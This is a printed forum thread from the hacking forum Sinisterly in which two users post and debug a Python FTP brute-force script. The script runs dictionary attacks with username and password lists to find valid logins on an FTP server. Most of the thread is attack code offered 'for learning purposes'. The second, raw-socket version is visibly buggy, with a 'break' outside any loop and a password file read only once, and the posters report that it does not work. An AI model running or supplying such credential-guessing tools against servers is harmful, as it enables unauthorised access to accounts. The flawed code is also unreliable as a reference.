Sinisterly
[Python] FTP Brute - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Coding (https://sinister.ly/Forum-Coding)
+--- Forum: Python (https://sinister.ly/Forum-Python)
+--- Thread: [Python] FTP Brute (/Thread-Python-FTP-Brute)

Pages: 1 2


[Python] FTP Brute - mls577 - 06-25-2013

This is a ftp brute forcer written in python by me and now noize with the updated code. I thought I'd post it for learning purposes, have fun.

Code:
#!/usr/bin/env/python3.1
#ftpbrute.py
#mls577 and noize
#shoutz to suidrewt and #haxme
#ftpbrute is a simple ftp brute force tool that noize and I wrote that will take a single username, or a list of usernames from a file and try them
#along with a specified password file to do a dictionary attack on an ftp server in order to find login credentials

#imports
import socket, sys
import ftplib
from ftplib import FTP

successful_logins = [] #list of successful logins

def main():
    if(len(sys.argv) < 4): # argument check
        usage() # if not enough args are specified print usage
    else:
        usage()
        userpass() #else call userpass()
        if(len(successful_logins) == 0):
            print("\n\nNo Successful Logins Found")
        else:
            print("\n\nSuccessful Logins Found: \n")
            for creds in successful_logins:
                print(creds)

def usage():
    print("\n  ###########################################################################")
    print("  #                              FTP BRUTE 1.0                              #")
    print("  #                                                                         #")
    print("  #                        Coded by mls577 and noize                        #")
    print("  #                          #suidrewt and #haxme                           #")
    print("  ###########################################################################")
    print("\n Usage: ftpbrute.py [host] [single | multi] [username | userslist] [passlist]")
    print("\n Examples:")
    print("\n  ftpbrute.py www.example.com single admin pass.txt")
    print("  ftpbrute.py www.example.com multi users.txt pass.txt")

def userpass():

    username_option = sys.argv[2] # user mode
    password_file = open(sys.argv[4], 'r') # password file

    if(username_option == "single"):
        user = sys.argv[3] #username

        for password in password_file:
            connect(user, password) #pass credentials to connect()

    elif(username_option == "multi"):

        username_file = open(sys.argv[3], 'r') #username file
        
        for user in username_file:
            for password in password_file:              
                login = connect(user, password) #pass credentials to connect()

    else:
        print("Error! Unexpected user option!")

def connect(user, password):

    host = sys.argv[1] #ftp server address

    try:
        FTP(host, user, password) #attempted ftp connection
        print("\nNow trying: " + user + " " + password + "\nSuccessful Login!")
        creds = user + ":" + password #format
        successful_logins.append(creds) #add successful logins to list
    except ftplib.error_perm:
        print("\nNow trying: " + user + " " + password + "\nUnsuccessful Login")
        

main()



RE: [Python] FTP Brute - MrGeek - 06-25-2013

This is interesting mate Smile
I will check this out.


RE: [Python] FTP Brute - noize - 06-26-2013

This is a good idea, though, I tested this on my host on port 21 with single user mode (my username) and with a passlist containing 6 words where one was the correct one and it just failed.


RE: [Python] FTP Brute - mls577 - 06-26-2013

(06-26-2013, 07:45 AM)noize Wrote: This is a good idea, though, I tested this on my host on port 21 with single user mode (my username) and with a passlist containing 6 words where one was the correct one and it just failed.

sorry about that, I checked my code and found a few errors, they should be fixed now, try the new code.


RE: [Python] FTP Brute - noize - 06-26-2013

(06-26-2013, 08:44 AM)mls577 Wrote:
(06-26-2013, 07:45 AM)noize Wrote: This is a good idea, though, I tested this on my host on port 21 with single user mode (my username) and with a passlist containing 6 words where one was the correct one and it just failed.

sorry about that, I checked my code and found a few errors, they should be fixed now, try the new code.

Well, now I get "login successful!" for any password, lol.


RE: [Python] FTP Brute - mls577 - 06-26-2013

(06-26-2013, 10:06 AM)noize Wrote:
(06-26-2013, 08:44 AM)mls577 Wrote:
(06-26-2013, 07:45 AM)noize Wrote: This is a good idea, though, I tested this on my host on port 21 with single user mode (my username) and with a passlist containing 6 words where one was the correct one and it just failed.

sorry about that, I checked my code and found a few errors, they should be fixed now, try the new code.

Well, now I get "login successful!" for any password, lol.
Seriously? that didn't happen for me when I just test it. mother fucker. it's late here, I'll look at it tomorrow. try remove code == 220 from the if statement near the end, see if that works.


RE: [Python] FTP Brute - noize - 06-26-2013

(06-26-2013, 10:16 AM)mls577 Wrote:
(06-26-2013, 10:06 AM)noize Wrote:
(06-26-2013, 08:44 AM)mls577 Wrote:
(06-26-2013, 07:45 AM)noize Wrote: This is a good idea, though, I tested this on my host on port 21 with single user mode (my username) and with a passlist containing 6 words where one was the correct one and it just failed.

sorry about that, I checked my code and found a few errors, they should be fixed now, try the new code.

Well, now I get "login successful!" for any password, lol.
Seriously? that didn't happen for me when I just test it. mother fucker. it's late here, I'll look at it tomorrow. try remove code == 220 from the if statement near the end, see if that works.

I already tried, but it just says "login failed" like before.

However, take a look at this: http://en.wikipedia.org/wiki/List_of_FTP_server_return_codes

220 does not seem to be what you need, you should probably take that away.

P.S: may I suggest editing the code like this:

Code:
#mls577
# shoutz to suidrewt and #haxme
#ftpbrute is a simple ftp brute force tool I wrote that will take a single username, or a list of usernames from a file and try them
#along with a specified password file to do a dictionary attack on an ftp server in order to find login credentials
import socket, sys #imports

def main():
    if(len(sys.argv) < 5): # argument check
        usage()
    else:
        userpass()


def usage():
    print("FTP Brute by mls577 ")
    print(" shoutz to #suidrewt and #haxme")
    print("./ftpbrute.py <host> <port> <user option> <user or user list> <pass list>")
    print("\nsingle user mode:")
    print("./ftpbrute.py <host> <port> single <username> <password_file>")
    print("ex: ./ftpbrute.py <host> <port> single mls577 /home/mls577/pass.txt")
    print("\nmulti-user and multi-pass: ")
    print("./ftpbrute.py <host> <port> multi <username_list> <password_list>")
    print("ex: ./ftpbrute.py <host> <port> multi /home/mls577/user.txt /home/mls577/pass.txt")



def userpass():
    username_option = sys.argv[3] #user mode


    
    password_file = open(sys.argv[5], 'rb') #password file
    

    if(username_option == "single"):
        user = sys.argv[4]
        user = str.encode(user)
        for password in password_file:
            connect(user, password)

    elif(username_option == "multi"):
        
        username_file = open(sys.argv[4], 'rb')
        
        for user in username_file:
            for password in password_file:
                print(user, password)                
                login = connect(user,password)
        
    else:
        print("wrong user option")



def connect(user, password):
    
    
    s = socket.socket() #create socket
    host = sys.argv[1] #host
    port = sys.argv[2] #port
    s.connect((host, int(port))) #makes connection
    print("\ntrying " + str(user) + " " + str(password))
    s.send(b'USER ' + user + b'\r\n') #send username
    s.send(b'PASS ' + password + b'\r\n') #send password
    code = s.recv(3) #recieve ftp response code
    #check ftp response code for successful login, which is normally 230 but I found in some software it was 220 instead
    if(int(code) == 230):
        print("login successful!")
        break
    else:
        print("login failed")
        
main()

changelog:
- not showing usage if arguments are valid;
- breaks if login is successful.


RE: [Python] FTP Brute - mls577 - 06-26-2013

(06-26-2013, 10:33 AM)noize Wrote:
(06-26-2013, 10:16 AM)mls577 Wrote:
(06-26-2013, 10:06 AM)noize Wrote:
(06-26-2013, 08:44 AM)mls577 Wrote:
(06-26-2013, 07:45 AM)noize Wrote: This is a good idea, though, I tested this on my host on port 21 with single user mode (my username) and with a passlist containing 6 words where one was the correct one and it just failed.

sorry about that, I checked my code and found a few errors, they should be fixed now, try the new code.

Well, now I get "login successful!" for any password, lol.
Seriously? that didn't happen for me when I just test it. mother fucker. it's late here, I'll look at it tomorrow. try remove code == 220 from the if statement near the end, see if that works.

I already tried, but it just says "login failed" like before.

However, take a look at this: http://en.wikipedia.org/wiki/List_of_FTP_server_return_codes

220 does not seem to be what you need, you should probably take that away.

P.S: may I suggest editing the code like this:

Code:
#mls577
# shoutz to suidrewt and #haxme
#ftpbrute is a simple ftp brute force tool I wrote that will take a single username, or a list of usernames from a file and try them
#along with a specified password file to do a dictionary attack on an ftp server in order to find login credentials
import socket, sys #imports

def main():
    if(len(sys.argv) < 5): # argument check
        usage()
    else:
        userpass()


def usage():
    print("FTP Brute by mls577 ")
    print(" shoutz to #suidrewt and #haxme")
    print("./ftpbrute.py <host> <port> <user option> <user or user list> <pass list>")
    print("\nsingle user mode:")
    print("./ftpbrute.py <host> <port> single <username> <password_file>")
    print("ex: ./ftpbrute.py <host> <port> single mls577 /home/mls577/pass.txt")
    print("\nmulti-user and multi-pass: ")
    print("./ftpbrute.py <host> <port> multi <username_list> <password_list>")
    print("ex: ./ftpbrute.py <host> <port> multi /home/mls577/user.txt /home/mls577/pass.txt")



def userpass():
    username_option = sys.argv[3] #user mode


    
    password_file = open(sys.argv[5], 'rb') #password file
    

    if(username_option == "single"):
        user = sys.argv[4]
        user = str.encode(user)
        for password in password_file:
            connect(user, password)

    elif(username_option == "multi"):
        
        username_file = open(sys.argv[4], 'rb')
        
        for user in username_file:
            for password in password_file:
                print(user, password)                
                login = connect(user,password)
        
    else:
        print("wrong user option")



def connect(user, password):
    
    
    s = socket.socket() #create socket
    host = sys.argv[1] #host
    port = sys.argv[2] #port
    s.connect((host, int(port))) #makes connection
    print("\ntrying " + str(user) + " " + str(password))
    s.send(b'USER ' + user + b'\r\n') #send username
    s.send(b'PASS ' + password + b'\r\n') #send password
    code = s.recv(3) #recieve ftp response code
    #check ftp response code for successful login, which is normally 230 but I found in some software it was 220 instead
    if(int(code) == 230):
        print("login successful!")
        break
    else:
        print("login failed")
        
main()

changelog:
- not showing usage if arguments are valid;
- breaks if login is successful.

I don't want it to break, because I want it to continue trying all the login combinations, even if it has already found one.

whether the usage should be displayed for both is relative, I think it's fine either way. For the life of me, I can't figure out why this won't work. I keep changing and trying different things, but for some god forsaken reason it won't just work. I wrote this nearly a year ago, and thought I got it to work properly, guess not.

about the response codes, I've seen that page and checked to make sure through the rfc: http://tools.ietf.org/html/rfc354 I know 230 is correct but on the ftp server I set up, for some reason it kept sending back 220 as the login successful.
thanks for the help. I'll keep working to figure this out.


RE: [Python] FTP Brute - noize - 06-26-2013

(06-26-2013, 10:57 PM)mls577 Wrote: I don't want it to break, because I want it to continue trying all the login combinations, even if it has already found one.

Oh, well, you're right, I didn't think about when the user chooses to use the "multi" option.

Quote:whether the usage should be displayed for both is relative, I think it's fine either way. For the life of me, I can't figure out why this won't work. I keep changing and trying different things, but for some god forsaken reason it won't just work. I wrote this nearly a year ago, and thought I got it to work properly, guess not.

thanks for the help. I'll keep working to figure this out.

I tried switching a few error codes but I just can't get it too. Does it work for you?


RE: [Python] FTP Brute - mls577 - 06-26-2013

(06-26-2013, 11:01 PM)noize Wrote:
(06-26-2013, 10:57 PM)mls577 Wrote: I don't want it to break, because I want it to continue trying all the login combinations, even if it has already found one.

Oh, well, you're right, I didn't think about when the user chooses to use the "multi" option.

Quote:whether the usage should be displayed for both is relative, I think it's fine either way. For the life of me, I can't figure out why this won't work. I keep changing and trying different things, but for some god forsaken reason it won't just work. I wrote this nearly a year ago, and thought I got it to work properly, guess not.

thanks for the help. I'll keep working to figure this out.

I tried switching a few error codes but I just can't get it too. Does it work for you?

no, I still can't get it to work properly for some reason. We could work on this together?